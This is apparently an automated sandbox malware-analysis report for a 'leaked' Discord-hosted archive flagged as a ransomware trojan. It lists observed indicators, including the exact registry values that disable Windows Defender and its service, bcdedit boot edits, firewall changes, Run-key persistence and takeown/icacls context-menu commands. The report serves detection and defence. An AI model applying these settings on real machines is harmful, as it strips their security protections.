Malware Analysis Report

2025-08-05 20:44

Sample ID 240302-21wdzsab71
Target https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Tags
evasion persistence ransomware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1& was found to be: Known bad.

Malicious Activity Summary

evasion persistence ransomware trojan upx

Modifies Windows Defender Real-time Protection settings

Modifies visibility of file extensions in Explorer

Modifies security service

Modifies boot configuration data using bcdedit

Stops running service(s)

Modifies Windows Firewall

Modifies system executable filetype association

Executes dropped EXE

UPX packed file

Loads dropped DLL

Adds Run key to start application

Launches sc.exe

Enumerates processes with tasklist

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Enumerates system info in registry

Runs net.exe

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-02 23:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-02 23:03

Reported

2024-03-02 23:08

Platform

win10v2004-20240226-en

Max time kernel

273s

Max time network

280s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" C:\Windows\system32\reg.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
